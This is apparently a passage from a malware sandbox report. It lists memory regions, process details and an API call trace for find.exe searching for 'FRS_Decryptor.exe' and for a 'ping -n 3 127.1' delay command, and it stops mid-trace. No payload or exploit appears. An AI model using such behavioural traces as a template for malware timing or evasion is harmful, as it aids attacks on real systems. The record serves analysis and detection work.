entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4446 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4447 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4448 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4449 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 4450 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4451 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4452 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4453 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4454 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4455 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4456 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4457 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4458 start_va = 0x7f080000 end_va = 0x7f17ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f080000" filename = "" Region: id = 4459 start_va = 0x73430000 end_va = 0x73471fff entry_point = 0x73430000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 4460 start_va = 0xca0000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 4461 start_va = 0xd10000 end_va = 0xd4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 4462 start_va = 0xd50000 end_va = 0xd8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 4463 start_va = 0x2e20000 end_va = 0x2e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e20000" filename = "" Region: id = 4464 start_va = 0x2e60000 end_va = 0x2e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e60000" filename = "" Region: id = 4465 start_va = 0x2ea0000 end_va = 0x2edffff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 4466 start_va = 0x73420000 end_va = 0x7342ffff entry_point = 0x73420000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 4467 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4468 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4469 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 4470 start_va = 0x7f07d000 end_va = 0x7f07ffff entry_point = 0x0 region_type = private name = "private_0x000000007f07d000" filename = "" Region: id = 4471 start_va = 0x7f1a7000 end_va = 0x7f1a9fff entry_point = 0x0 region_type = private name = "private_0x000000007f1a7000" filename = "" Region: id = 4472 start_va = 0x7f1aa000 end_va = 0x7f1acfff entry_point = 0x0 region_type = private name = "private_0x000000007f1aa000" filename = "" Region: id = 4473 start_va = 0x73370000 end_va = 0x7341afff entry_point = 0x73370000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Thread: id = 245 os_tid = 0x93c Thread: id = 247 os_tid = 0x840 Thread: id = 248 os_tid = 0x9e0 Thread: id = 249 os_tid = 0xbf8 Process: id = "84" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x1966c000" os_pid = "0x4f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "82" os_parent_pid = "0x934" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4382 start_va = 0x320000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 4383 start_va = 0x340000 end_va = 0x341fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 4384 start_va = 0x350000 end_va = 0x35efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 4385 start_va = 0x360000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 4386 start_va = 0x3a0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 4387 start_va = 0x3e0000 end_va = 0x3e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 4388 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 4389 start_va = 0x400000 end_va = 0x401fff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4390 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 4391 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4392 start_va = 0x7e810000 end_va = 0x7e832fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e810000" filename = "" Region: id = 4393 start_va = 0x7e838000 end_va = 0x7e838fff entry_point = 0x0 region_type = private name = "private_0x000000007e838000" filename = "" Region: id = 4394 start_va = 0x7e83c000 end_va = 0x7e83cfff entry_point = 0x0 region_type = private name = "private_0x000000007e83c000" filename = "" Region: id = 4395 start_va = 0x7e83d000 end_va = 0x7e83ffff entry_point = 0x0 region_type = private name = "private_0x000000007e83d000" filename = "" Region: id = 4396 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4397 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4398 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4399 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4404 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 4405 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4406 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4407 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4474 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 4475 start_va = 0x330000 end_va = 0x333fff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 4476 start_va = 0x340000 end_va = 0x343fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 4477 start_va = 0x410000 end_va = 0x48dfff entry_point = 0x410000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4478 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 4479 start_va = 0x760000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 4480 start_va = 0x73360000 end_va = 0x7336efff entry_point = 0x73360000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Region: id = 4481 start_va = 0x73500000 end_va = 0x73520fff entry_point = 0x73500000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 4482 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4483 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4484 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4485 start_va = 0x7e710000 end_va = 0x7e80ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e710000" filename = "" Thread: id = 246 os_tid = 0x9e4 Process: id = "85" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x5adc000" os_pid = "0x860" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4486 start_va = 0x670000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 4487 start_va = 0x690000 end_va = 0x691fff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 4488 start_va = 0x6a0000 end_va = 0x6aefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 4489 start_va = 0x6b0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 4490 start_va = 0x6f0000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 4491 start_va = 0x730000 end_va = 0x733fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 4492 start_va = 0x740000 end_va = 0x740fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 4493 start_va = 0x750000 end_va = 0x751fff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 4494 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 4495 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4496 start_va = 0x7e9d0000 end_va = 0x7e9f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e9d0000" filename = "" Region: id = 4497 start_va = 0x7e9f4000 end_va = 0x7e9f4fff entry_point = 0x0 region_type = private name = "private_0x000000007e9f4000" filename = "" Region: id = 4498 start_va = 0x7e9fc000 end_va = 0x7e9fefff entry_point = 0x0 region_type = private name = "private_0x000000007e9fc000" filename = "" Region: id = 4499 start_va = 0x7e9ff000 end_va = 0x7e9fffff entry_point = 0x0 region_type = private name = "private_0x000000007e9ff000" filename = "" Region: id = 4500 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4501 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4502 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4503 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4504 start_va = 0x860000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 4505 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4506 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4507 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4508 start_va = 0x670000 end_va = 0x67ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 4509 start_va = 0x680000 end_va = 0x683fff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 4510 start_va = 0x690000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 4511 start_va = 0x760000 end_va = 0x7ddfff entry_point = 0x760000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4512 start_va = 0xb10000 end_va = 0xc0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 4513 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 4514 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 4515 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4516 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4517 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4518 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4519 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4520 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4521 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4522 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4523 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4524 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4525 start_va = 0x7e8d0000 end_va = 0x7e9cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e8d0000" filename = "" Region: id = 4526 start_va = 0x7e0000 end_va = 0x81ffff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 4527 start_va = 0x820000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 4528 start_va = 0x7e9f9000 end_va = 0x7e9fbfff entry_point = 0x0 region_type = private name = "private_0x000000007e9f9000" filename = "" Region: id = 4529 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 4530 start_va = 0x870000 end_va = 0x872fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 4531 start_va = 0x880000 end_va = 0x880fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 4532 start_va = 0x890000 end_va = 0x892fff entry_point = 0x890000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Thread: id = 250 os_tid = 0x848 [0094.203] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0094.203] __set_app_type (_Type=0x1) [0094.203] __p__fmode () returned 0x76ea1768 [0094.203] __p__commode () returned 0x76ea176c [0094.203] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0094.203] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0094.203] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.205] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0094.205] _fileno (_File=0x76ea4c28) returned 1 [0094.205] _get_osfhandle (_FileHandle=1) returned 0x28 [0094.205] GetFileType (hFile=0x28) returned 0x2 [0094.205] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x72eeb0 | out: lpMode=0x72eeb0) returned 0 [0094.205] GetLastError () returned 0x6 [0094.205] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x72ee14, nSize=0x50 | out: lpBuffer="䤐±") returned 0x0 [0094.205] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0094.208] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x72eecc | out: phkResult=0x72eecc*=0x88) returned 0x0 [0094.208] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x72eec0, lpData=0x72eec8, lpcbData=0x72eec4*=0x4 | out: lpType=0x72eec0*=0x0, lpData=0x72eec8*=0x0, lpcbData=0x72eec4*=0x4) returned 0x2 [0094.208] RegCloseKey (hKey=0x88) returned 0x0 [0094.208] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0x72ee90*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x72eecc | out: ppResult=0x72eecc*=0xb1c138*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb18940*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0094.208] FreeAddrInfoW (pAddrInfo=0xb1c138*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb18940*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0094.208] IcmpCreateFile () returned 0xb16a68 [0094.211] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0xb1c2f0 [0094.211] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0xb25270 [0094.211] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x72efc8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0094.213] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x72eec0, nSize=0x0, Arguments=0x72eebc | out: lpBuffer="竈²r┗\x94䰨盪❋") returned 0x14 [0094.213] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0094.213] _fileno (_File=0x76ea4c28) returned 1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x28 [0094.213] GetFileType (hFile=0x28) returned 0x2 [0094.213] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x72ee84 | out: lpMode=0x72ee84) returned 0 [0094.213] GetLastError () returned 0x6 [0094.214] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x72ede8, nSize=0x50 | out: lpBuffer="r❋") returned 0x0 [0094.214] _fileno (_File=0x76ea4c28) returned 1 [0094.214] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0094.214] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.214] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xb27b00 [0094.214] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0xb27b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0094.214] _fileno (_File=0x76ea4c28) returned 1 [0094.214] _write (in: _FileHandle=1, _Buf=0xb27b00*, _MaxCharCount=0x14 | out: _Buf=0xb27b00*) returned 20 [0094.214] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0094.214] _fileno (_File=0x76ea4c28) returned 1 [0094.214] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0094.214] LocalFree (hMem=0xb27b00) returned 0x0 [0094.214] LocalFree (hMem=0xb27ac8) returned 0x0 [0094.214] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x72eec0, nSize=0x0, Arguments=0x72eebc | out: lpBuffer="竈²r▪\x94䰨盪❚") returned 0x18 [0094.214] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0094.214] _fileno (_File=0x76ea4c28) returned 1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x28 [0094.214] GetFileType (hFile=0x28) returned 0x2 [0094.214] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x72ee84 | out: lpMode=0x72ee84) returned 0 [0094.214] GetLastError () returned 0x6 [0094.214] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x72ede8, nSize=0x50 | out: lpBuffer="r❚") returned 0x0 [0094.214] _fileno (_File=0x76ea4c28) returned 1 [0094.214] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0094.214] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0094.214] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0xb1c138 [0094.214] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0xb1c138, 